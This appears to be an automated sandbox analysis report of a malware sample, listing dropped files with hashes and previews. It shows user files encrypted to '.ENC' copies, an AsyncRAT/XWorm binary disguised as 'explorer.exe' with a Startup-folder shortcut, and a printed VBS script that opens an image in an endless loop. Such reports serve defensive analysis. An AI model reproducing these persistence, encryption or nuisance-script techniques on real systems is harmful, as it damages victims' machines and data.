                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yc2welzi.yun.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yppo0orq.2m3.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpoglvcm.ugz.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\user.bmp.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):602176
                                                                                        Entropy (8bit):7.999729060206054
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:Wxlz3+cQo3XmNBgwfg+Xy9eTKAoHlURuzwcGaN6ouxVYN5ek:Q+zHBg/+XyEK/muscGaNqxVyIk
                                                                                        MD5:BEC3C83AF50E19361BA631DB7B603C24
                                                                                        SHA1:E085803996D7BB94DDD1467B9F670497D6888CD0
                                                                                        SHA-256:AE39030ECAA79FC5D5B13F719DCC9DF9D96EB120DD963F6653F8ADD45BFD679D
                                                                                        SHA-512:B8DDEEE4774256B80A863F23CD55D51DBC88F21E44189D544CFFF9DE2566C17D77F8C1577A9D0CE3954C4750E38A1029CCD63189A53B28E31F089188DA3BD04B
                                                                                        Malicious:false
                                                                                        Preview:.C..%.>....c.n=....8.^==6P.I..m..H.i........m..V........^{........6M...$.A.....-o.JEo+.....G..;..;.|....5..~."6...) ......!..H+.....n.03F.K...}4..@..l.....+iv<.qM..>..K..ym.=..@....e...W..nE...I.b[ .U&............ .Wn.[...F..v'.4.q......k........|)....&.^..._,.q&@p."/..)......)..c-.dt15.?.......6.J.n/.D.'..xE..D..Q3.e...M..w...s#....uW}.....K..8]=.G..j....@.j.m..8....W..>...H8!E....A...X?e+..3.../.K.p<......hi.5....(2Z..M..O|M .B../.|R2m..Md'Bf`V|.R..l.Y....ix}..t......D.|.r:.+$....!.$.<....7.......ZPp........e...bV>.RF;%.M.!x..Hx..:......;....2...G.{.-'u 3d .l..z...z.:.h..W33.'n......<....t....7;..d...L..ml......P].9!...v...{.^.<.S....B..qQ..*...W..(..s$.....d8..J.W...H.+<O.sg....d........Y.^..hx...^4~.`R..N*...=..t]...K<...Q).-..W........L<RG.8s..d+...8...J.8.j..(.}Gzt.8..F.g...]]B.$..c.;O..yY....~2R.m....,.;EM.\..]..5./....-.].....K..c.....(.3e..w......H..>.K.vs\.R..3....F.5&....b|....9.}B....@..Q..O).Wx.....L.......d;R..@.B.'I.@.R.

                                                                                        C:\Users\user\AppData\Local\Temp\chrome.exe.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):140816
                                                                                        Entropy (8bit):7.998788923404493
                                                                                        Encrypted:true
                                                                                        SSDEEP:3072:PZYUbpmGSSmeHmXrJeTctV3lfKAeFXEqGxW5xO5Hn:6kNmXwaV3lfKAPM3O5H
                                                                                        MD5:DDA20F253DC80B9F05C3E3D11FE0FA7F
                                                                                        SHA1:F2E500C117A1C8AF65BE3711BF3F99112D5B4E17
                                                                                        SHA-256:EE981C894D148228A331E1EE5D598CE4D6A845225918863C04D3C89E54AE7172
                                                                                        SHA-512:6C16E146687B7B78A81667A98C268EEB2344EA823278BF0080099CEB7D60BF2EBA8EB449DCE591B2F4ECF36C7463733FE449E2DEA6F6C21400FC7E5CCCADFA8C
                                                                                        Malicious:false
                                                                                        Preview:..........d.A..P............S'...\..].*.....4.rq..l4.<`E..i...O...g/.XM..%[L...............{.V.?.ys..3.*.S..+....~.c.....W...<... h....b..FNor3K..k..a..X.z..., 3>....o..n4......."C,1.I$.U{K...e...)....o.n.<.,.-..`E.......B.Z.pb-....%}..Bo^?.P5.E.jR..x...k.....?...8.G..y......7...{W..l.....kL_.d...6......%.0 E.....i0...K.*Zh.L....g.O..h...+.\)..........)z..$Y.. .k]63{_|......\4........QfL..h.. ....Zk.0....n.84eE..9....("..W.....M..V?.a<.w........N.n..|C....*.i.M..m.3.rI....C.v`t.L...1.ocC.> 3.na..)9r..a........Z...b=R.L...L.....E..OO..H1&..$...h..o.c.>H.pV.{..^2-M.(.vR.9........:..i./_V7.;.4..Ei..{H...O>61..M....x......$....E..y.]u../..U.qNA.3.e....+cA.]0h.,`.x....c.X|x....s...0tfn.j.fM-.Z...~y.H....h*.P5.uP.F.....e3.V..!O..(...O.....,5...~..yuk..aL.... .*..s...^.....V.g..........b....`..P.]........./.....z....h.@...........gl{....[.e8....E..Z.#\..B.k..OZq..G.$i.S.....x..V.%..>.....I......a........-.......e..z.R.....q$.....o

                                                                                        C:\Users\user\AppData\Local\Temp\cv_debug.log.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:OpenPGP Public Key
                                                                                        Category:dropped
                                                                                        Size (bytes):1760
                                                                                        Entropy (8bit):7.893881337309218
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:iZpJPtEkLGAgoLegR/jfzWrOFrMacpHLJ:eTEuYdg9zvrMbf
                                                                                        MD5:03DA18E410D17631A5D8BC64243BAB0E
                                                                                        SHA1:4D7A5545DF037DEF2DDB97FAF91735FC17C45C6B
                                                                                        SHA-256:8757F587EC9FDD35B7BDD39A1E2EE704730D1C88B3BCC01F08C442CB9DA92468
                                                                                        SHA-512:A14BE4854600C1DD735152CB75353862C3251543975E252A4BE026329812AAD5F29F1415C35EED7AE1188FC6791D03F1143160C12FDCFEFE1AA4059347D2071C
                                                                                        Malicious:false
                                                                                        Preview:..+*.....>.*.FM...8...x....#.....t...@N"..6.#.'i..r.....W-I..BE...r.Q....M?.....}..MQg7G#."....H...bv.[....>.*....E.....B...7.t.............p..2..U.R....`...8..L.:}.Y.0.v7.>.}?E.xH.f!-..j>.....A)...&.;q@`7Vq2.k.S...|.w..(...y}N..........-0o.H..........P....>...+_...j....m`.l...).;W..j..-r.\~..N%...^......<...4...(F....lwu.2.w..r..D6[O(UP..8.0sQ.($....<...../..SNj.].$?I...........#'K.......Orx......0....D...;.....o..{..i..#.,4..kE~.i.......yV!V.[.h....wn...[~....pW]I'...Mu6.H..Q.j.H..2..Z.Q.x.C...a_....Dy."4&.lG.y)...N.^..e.=.`. ......l.3..a<._G+.....v5.F..)R-.I.Rm`.........K...=Urt..U9..|$r_.$..-..b\..6:.U-..`N............>G..'.|.]-vN..O........uV.M.E.z....,..%.....2..N."...GxR`.9...J.D......n.[.R...B....S.s...).~6j-...x.. .L.u.....x.>..\....\.I...r#.'....2o..z.^..T.......B.mp|~..~...WrE.z..b....0...:v..?&].d>.......C....Y.K{_C..=h.....{T T.K.._3...m=..U..........!....@.......S.g.z.7NAc..D....AE.6.1._..GsR...}.m...b...B{Z,k.z.W8.

                                                                                        C:\Users\user\AppData\Local\Temp\dbghelp.dll.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):1527504
                                                                                        Entropy (8bit):7.999872469826279
                                                                                        Encrypted:true
                                                                                        SSDEEP:24576:opqrivmeWFNFpejqzYblD63YfvGmJKfnr9iBQfsXEYVoBldx810nE7DAqA8zZVdT:aqriXCRgqzYblqYfvGmJcnrEX/V22V7f
                                                                                        MD5:E77ED19D9D5EC28CDE639A0683C6A57E
                                                                                        SHA1:424D59FE98D1851AF0E894C6FBB314CA0B7EC3FD
                                                                                        SHA-256:808F8F96FF42EA16EBEF02A248554D37FF3AA139F467AE22EF7C9F3E42021C3E
                                                                                        SHA-512:D09F9BD4C16F8C95D8931D923D9A1CB91341866B81393C86FC0049CB5BCB62B786A0D2422BB812FBA36DAB9BAA92B135A3B45394E16B85FFD67C2FDBE1F0A12F
                                                                                        Malicious:false
                                                                                        Preview:..........d.A..P............S'...\..].*.....4.:.U...F.......+.....?.h.{I~.dG....g%^.+yP..Q....Y.}...E..tfzk2...K...E..l..........|.I.ql.?.....Vmf...A..UjV....;.$Jd.^...8dm..f..........BT1....A.!.t....\/J..N>.......0h@.2...w. .0.-..K..Q.F....d.>3...y.\].g..*..X1".k.VA.Rd..[j...;.....n..A-......(...r+~.g9.Ay..z..x..5F..".aWo........?.~3..TN...@.[%.[...@.......%"2y...`.Z.(......Z.:.>.f..A..%]..80....Xv....S.z.....6..\!..G.#5.]...|..t......`v-y..o.Is.....?a...S....I...A..~...T..R.........]....+...{X.....{p......gx4.x.I7c.L......!t-..B. ......i......{4..#...g.j...C....(....XM.8.~b}miX.u..s..a.rsS...I...$...?.....:!R.\.w.3.#.B..j..$a..Y....u.*.:x.....r-.m.B...,g;..+h.Vn.}...u...u#.90.W..d..3.n.^0..xv.$..rz.`.-..)%.sc.....{.J..S..ks...".IHu....O"..X.]..]#..l.ud.{J..38.i...!.q....P...da.FF$az.fC&.E.X...H...R..Q.....lT.I...t../*#LR..Z.+..J4..p... .....K.......^..Kb.....7.....o...eI...Oa..<.=.......pK.......K..Dw.=.b.H.....$.x*............}.

                                                                                        C:\Users\user\AppData\Local\Temp\picture.png

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\voosiq.exe
                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 624x350, components 3
                                                                                        Category:dropped
                                                                                        Size (bytes):42842
                                                                                        Entropy (8bit):7.980156470448539
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:fB+4mLI4Qm76b9Sg7kKvWor9dIz2RapPrxWVjIEM+E2Em1AFz8nB4PfNRz4t:fBxtkUWor9dIISxc7ENm+FInB0fnz4t
                                                                                        MD5:BBC0F85932FEDC52E29F1A10038169B1
                                                                                        SHA1:A7AF5FCB37B302420CBAF79EB0279DAF0F60CFBD
                                                                                        SHA-256:B52975AB66C40A837A06CA660A102F658872B5561A1C94000872C405A3B15731
                                                                                        SHA-512:D8265551AFF6D273FC7D1CED93DFA1259579962FC6AD418A27EDC4445A01978068FACF68D3A110FE6ED8CE94BF3FE728C48F166C63A5D045FD7DBDB12D035056
                                                                                        Malicious:false
                                                                                        Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................^.p..".........................................P........................!..1.."AQa2q..#B....R....3br$C..S...%...&46s.DTcdt....................................>.........................!1.AQ."aq.2.......#..B.34R.$b.CScr.............?........u..!Q.(.@..QB..R.+.)E.P...p+....^.....J...!.Z:..(.W.....yE(.j....Ex.:...E...8.!..:..)E.!..8...p(B.(.(.R.(B..u...u.!..QE..:....:..:...E,.M/..._L!..I...8..v.8..L>.p./.G.o..j.^%KG.s.=9.7O.M,..n.......k..kY...j.?:.`.t-.S......;.c....0*.egwp..P....T...*..........Nn....{......^L..(.....f....oq~~Q...i.D.Ac....&2...).....0].dh.C.........fnCG..|M..j*7r$...K.......O....8N......9.....Y..{Q~..ST/.q.7...>J........t..N....S..........F..ulu...n).S]......G..S...|............R-.$..d.6...C[..P.lS..X.gI..'..JGo..*...+..d..C....Q.....1..<v..=....1.......i...:..k...../|...3.3.../.

                                                                                        C:\Users\user\AppData\Local\Temp\script.vbs

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\voosiq.exe
                                                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):240
                                                                                        Entropy (8bit):5.228627490300731
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:j+q9Nqhn6JND7HrpkKE6QO8/GQ0kQkPyec3Pz:Kqah6J1Trpkv6hDQ0kQkxwz
                                                                                        MD5:92532347E1AB8BDDBF09A71A1CA7F808
                                                                                        SHA1:DD765C6E8B69F52895FE92F32FD6B8817CE2A3EE
                                                                                        SHA-256:5A5395C770D86EECD51DA9C8612AD27E0BB85359788A64AF8CB5E380362DE4A7
                                                                                        SHA-512:481A5188D5FA2A512CD101C909A580AF61795406C9DF9A32066E2084538779FFA909AB6E484AFDD7086B07491A3F95B9CD84AD47B02454A0E9C38C35ECA1C342
                                                                                        Malicious:true
                                                                                        Preview:Set objShell = CreateObject("WScript.Shell")..objShell.Run "Hamster.mp3", 1, False..Do.. objShell.Run "picture.png", 1, False.. WScript.Sleep 100 ' ........ 5 ...... ..... ......... ...........Loop

                                                                                        C:\Users\user\AppData\Local\Temp\voosiq.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):2638132
                                                                                        Entropy (8bit):7.9220003904045
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:fEuq6iXO25NRDqw8nAOO4d8y7gSTcl2vzRnGeI1n5qm49UxtZuB:fFqfbDqw4OLQrEeIb949UZ2
                                                                                        MD5:BD950F6C677CD5E6C0D39FE8E6543E37
                                                                                        SHA1:4F24CB7586ABDCDB6791D857E52D16E352EED09A
                                                                                        SHA-256:B518BFFC32040E3C830ECB74FE2B16AE24F8BA22F4730E05221E9DCDB452235D
                                                                                        SHA-512:76CE2774D482811C378739532FDB40EC491AC32A4984B8DF67340CF9994F5E35EE8BB1045EBD379413D9DCE264DEFDADF0F15C91F8FCE7FEBBADADE8D3DC3946
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 58%
                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........B#..,p..,p..,p.:.p..,p.:.p5.,p.:.p..,p<..p..,p<.(q..,p<./q..,p<.)q..,p..p..,p..p..,p..p..,p..-p..,p2.)q..,p2.,q..,p2..p..,p2..q..,pRich..,p................PE..d...+.@f.........."....!.....L.......f.........@..........................................`............................................4.......P................*..............8....`..T....................a..(.......@............................................text.............................. ..`.rdata..............................@..@.data...\...........................@....pdata...*.......,..................@..@.didat..............................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\_curlrc.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):4.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:rDahRyb:X7b
                                                                                        MD5:BAE85163D03C0620A91B92790F631FA7
                                                                                        SHA1:21BDA19513E900C700056EE7815964B99BB4B7FB
                                                                                        SHA-256:3B70004C98E65164AB262C3F10691F03A1B0A6DDA6B7E2BDC3644BBE16A042DE
                                                                                        SHA-512:F82948D5E1BC968504732113601BC698981B619C44CF14C2278FAA04C6AC5B39D96F5966409D4E8A4E6CE68427D751CB5F0A0F316E741461C0A84DBA6DB60EFE
                                                                                        Malicious:false
                                                                                        Preview:..<...t....WA..

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:10:00 2024, mtime=Sun Oct 13 16:10:00 2024, atime=Sun Oct 13 16:10:00 2024, length=78848, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):772
                                                                                        Entropy (8bit):5.0050108292258075
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:8nisxi4ftjT88CMplsY//HI8hHELZXJu84YrjOjAGFH/DZZbwcec3mV:8nisZfZ48JpZAFfzzmAiFVwcec3m
                                                                                        MD5:2871C603E86CE7519D5BCA8423BA8B85
                                                                                        SHA1:393BF6BE3D5976D299FB9F926E1FDA61B9C5A313
                                                                                        SHA-256:F84109CD9DBE4C87186D980AEEBC7C237BC201B1BF84921A1B5B3A91DC3B471A
                                                                                        SHA-512:AFAA4C244568F29CFE954A300F9D0AB0A8018E2F0E0CB2E7FF0216C9E60F62EB34BED336CF0DD7817919CBF8C989446874149ADD9383F0837EFD33C9C39D4E4F
                                                                                        Malicious:false
                                                                                        Preview:L..................F.... ...#vw.....#vw.....#vw......4......................z.:..DG..Yr?.D..U..k0.&...&...... M......P...............t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlMY......B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....MY....Roaming.@......DWSlMY......C......................UK.R.o.a.m.i.n.g.....f.2..4..MYA. .explorer.exe..J......MYA.MYA.....r).......................e.x.p.l.o.r.e.r...e.x.e.......[...............-.......Z..................C:\Users\user\AppData\Roaming\explorer.exe........\.....\.....\.....\.....\.e.x.p.l.o.r.e.r...e.x.e.`.......X.......134349...........hT..CrF.f4... ..wS....,...W..hT..CrF.f4... ..wS....,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                        C:\Users\user\AppData\Roaming\explorer.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):78848
                                                                                        Entropy (8bit):6.001807285203909
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:phkwqMfG4mxj/ilUBYrOAr+bRdTmxjefARv6tLEOgSq6pK1PboR:JqcS/HBYrOAr+bRcxjeY6EO1puM
                                                                                        MD5:B3A1A7EF45C3A920F515ADC541EE75F4
                                                                                        SHA1:FA69E1C57709DFA076E792509E6C77D297E47664
                                                                                        SHA-256:5CB0406BE361324ECAEAA54238D82B24DFFDFFF8AE35DD2A59301E83E71D9D79
                                                                                        SHA-512:8628CBAC85E04D9F0ADA20E6F46C74D3E22EDDA7095043E1F61BCFD7836B54F29F4DDE6DE6C72309FD8F7CF66A2D69D1FE7288914A213C35B1D40F7D98E4271C
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x.g.................*...........I... ...`....@.. ....................................@.................................tI..W....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................I......H.......Pm..$.......&.....................................................(....*.r...p*. O...*..(....*.r}..p*. h...*.s.........s.........s.........s.........*.r...p*. .(T.*.r9..p*. .\=.*.r...p*. *p{.*.r...p*. y!k.*.rS..p*. ...*..((...*.r...p*. ....*.r...p*. .r..*"(....+.*&(....&+.*.+5sd... .... .'..oe...(,...~....-.(J...(<...~....of...&.-.*.r3..p*. ..".*.r...p*. .i*.*.r...p*. u3..*.rM..p*. ....*.r...p*. .x!.*.r...p*. ~.H.*.rg..p*. ....*..............j..................sg....

                                                                                        C:\Users\user\NTUSER.DAT.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\_curlrc.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):4.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:rDahRyb:X7b
                                                                                        MD5:BAE85163D03C0620A91B92790F631FA7
                                                                                        SHA1:21BDA19513E900C700056EE7815964B99BB4B7FB
                                                                                        SHA-256:3B70004C98E65164AB262C3F10691F03A1B0A6DDA6B7E2BDC3644BBE16A042DE
                                                                                        SHA-512:F82948D5E1BC968504732113601BC698981B619C44CF14C2278FAA04C6AC5B39D96F5966409D4E8A4E6CE68427D751CB5F0A0F316E741461C0A84DBA6DB60EFE
                                                                                        Malicious:false
                                                                                        Preview:..<...t....WA..

                                                                                        C:\Users\user\ntuser.dat.LOG1.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\ntuser.dat.LOG2.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\ntuser.ini.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32
                                                                                        Entropy (8bit):4.663909765557392
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:RIEmbQxiE:ViE
                                                                                        MD5:BF6CDBDCB6760FD2821E4B52D006D6BF
                                                                                        SHA1:759E44E6659B081A1B5026E2992ED872DB221DCE
                                                                                        SHA-256:9046397EE730CAB23D10B4C6700B5760E464500CC5285B4628A570E8B548B0F8
                                                                                        SHA-512:2DAFE96CB1E9D9298FD7A27A9011D8A711410E13010FB3EE2434D700F45527CDB3FC31CC4D8E4A64F422C3E442CBC9076F323F3E1815424B96D9CBEE514A2D3A
                                                                                        Malicious:false
                                                                                        Preview:..aA.J9C.........9A.=.]r....9.1.

